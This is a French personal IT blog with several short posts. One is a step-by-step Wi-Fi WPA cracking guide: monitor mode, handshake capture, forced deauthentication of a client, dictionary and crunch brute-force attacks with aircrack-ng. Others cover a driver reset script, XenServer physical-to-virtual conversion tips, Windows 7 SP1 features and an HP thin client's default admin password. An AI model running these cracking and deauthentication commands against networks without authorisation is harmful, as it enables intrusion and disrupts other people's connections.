Bienvenue sur ILoveBlueScreen.org

Ce blog est rédigé par Alexandre Breniaux.

  • Links

  • Categories

  • Meta

  • Archives

  • MENU DE NAVIGATION

    Steve Jobs 1955-2011

    Pour moi le truc de génie c’est l’invention du « Personnal Computer » avec le premier Mac.

    Démarrage du mode monitoring de la carte wifi

    Airmon-ng

    Airmon-ng start wlan0

    (wlan0 étant le nom de l’interface wifi et mon0 l’interface de « monitoring »)

    Scan du réseau

    Airodump-ng mon0

    Scan d’une station precise et essaie de recup d’un handshake

    airodump-ng -c 6 –bssid 00:03:52:AD:AD:D1 -w fichiercapture mon0

    -c->channel

    –bssid->mac point d’accès

    -w->fichier de capture

    Mon0->interface de monitoring

    Forcer la désauthentification:

    aireplay-ng -0 1 -a 00:03:52:AD:AD:D1 -c 00:0F:B5:FD:FB:C2 mon0
    
    
    -a->mac point d’accès
    -c->mac station connectée
    -0->désauthentification
    1->nombre de désauthentifiaction envoyée
    Mon0->interface de monitoring
    
    

    Extraire les handshake

    tshark -r <input file name> -R "eapol || wlan.fc.type_subtype == 0x08" -w <output file name>
    
    

    Décrypter la preshared key

    root@bt:~# aircrack-ng -w password.lst -b 00:03:52:AD:AD:D1 fichiercapture*.cap
    
    
    -w->fichier de dictionnaire
    
    
    -b->point d’accès
    
    
    Psk*.cap->tous les fichiers de capture
    
    

    Utiliser crunch pour générer des mots de passe

    Se placer dans /pentest/passwords/crunch/

    /crunch 8 8 abcdefghijklmnopqrstuvwxyz | aircrack-ng -w- -b 00:03:52:AD:AD:D1 /root/fichiercapture*.cap

    /crunch 8 8 0123456789ABCDEF| aircrack-ng -w- -b 00:03:52:AD:AD:D1 /root/fichiercapture*.cap

    ./crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMONOPQQRSTUVWXYZ| aircrack-ng -w- -b 00:03:52:AD:AD:D1 /root/fichiercapture*.cap

    Lancez la VM en s’assurant que la carte wifi remonte bien sous VMware.

    Iwconfig

    Ifconfig wlan0 up

    Dmesg  SIOCSIFFLAGS: Unknown error 132

    Créez le script suivant, appellez le rtl8187 et enregistrez-le

    #!/bin/bash

    echo Suppression « du » module RTL8187

    rmmod rtl8187

    rfkill block all

    rfkill unblock all

    echo Ajout « du » module RTL8187

    modprobe rtl8187

    rfkill unblock all

    echo Activationd de l interface WLAN0

    ifconfig wlan0 up

    Donnez les droits au script

    Chmod 755 rtl8187

    Lancez le script

    ./rtl8187

    Désactivez l’interface

    Ifconfig wlan0 down

    Activez-la

    Ifconfig wlan0 up

    Voici une liste de conditions à respecter si vous désirer virtualiser un serveur physique sur un hyperviseur Xen Server 5.x

    • Récupérer la dernière version de XenConvert Tools

    http://www.citrix.com/lang/English/lp/lp_1688624.asp

    • Analyser l’état du serveur avec un chkdsk et réparer le disque si il est endommagé, sinon la machine virtuelle ne pourra pas démarrer.

    fsutil dirty query C:


    chkdsk c: /F/R

    • Assurez-vous que personne n’accède au serveur, afin que les fichiers ne soient pas verrouillés
    • Les services additionnels doivent être éteints, assurez-vous d’éteindre le maximum de services Windows(le mode sans échec avec prise en charge réseau est une solution).
    • L’antivirus doit être arrêté pendant la virtualisation
    • Activez le montage automatique des volumes(automount). Pour cela ouvrez la console dos puis saisissez

    Diskpart

    puis

    Automount enable


    • Si votre système possède plusieurs disques, par exemple C et D, le convertisseur va créer deux disques virtuels E : et F:. Vous devez vous assurez qu’aucun autre lecteurs utilisera les lettres précédents celles utilisées par vos lecteurs physiques qui seront virtualisés, sans quoi la virtualisation échouera.
    • Il est recommandé d’exécuter le convertisseur depuis la console et non le RDP.
    • Les logiciels de connections, les logiciels de monitoring de l’ordinateur et les utilitaires réseaux doivent être désinstallés, puis redémarrez le serveur.
    • Si vous avez un prompt au démarrage de la machine virtuelle vous annonçant qu’un driver est manquant, appuyez sur Cancel.
    • Une fois la machine virtuelle démarrée, installez les Xen Tools. Pour cela, il faut sélectionner le xs-tools.iso dans le menu DV-Drive qui se situe dans l’onglet Storage de XenCenter. Cela a pour effet de monter le DVD xen tools sur la machine virtuelle, il suffit de lancer l’installation et de redémarrer la machine virtuelle à la fin de celle-ci.

    Windows 7/Windows 2008 R2 SP1

    Voici les liens su SP1 de Windows 7 et Windows 2008 R2:

    Windows 7 x86 SP1

    Windows 7 x64 /Windows 2008 R2 SP1

    Nouvelles fonctionnalités apportées par le SP1:

    Windows 7

    Intégralité des mises à jour jusqu’à la sortie du SP1

    Nouvelles options du bureau à distance permettant d’utiliser les fontionnalités apportées par le SP1 de Windows 2008 R2

    Windows 2008 R2

    Microsoft RemoteFX, nouvelle fonctionnalité de Microsoft Hyper-V,  permet de virtualiser la carte vidéo du serveur pour fournir des possibilités d’affichage plus riche aux bureaux virtuels(notamment pour l’interface Aero, l’affichage des images et des vidéos).

    Dynamic Memory,nouvelle fonctionnalité de Microsoft Hyper-V, permet d’optimiser la consommation de la mémoire des machines virtuelles, permettant de faire fonctionner plus de machines virtuelles sur un Hyperviseur Hyper-V.

    Sur un terminal léger HP 5325 ThinPro, il est nécessaire de passer en « admin mode » afin de paramétrer les options avancées telles que l’autoconnect pour une session RDP ou bien la langue par défaut du terminal.

    Pour passer en « admin mode » pressez ctrl+alt+shift+S une fois le terminal démarré, puis « switch to admin mode ».

    Entrez le mot de passe « root ».

    Vous pouvez ensuite effectuer les paramètres nécessaire au bon fonctionnement du terminal.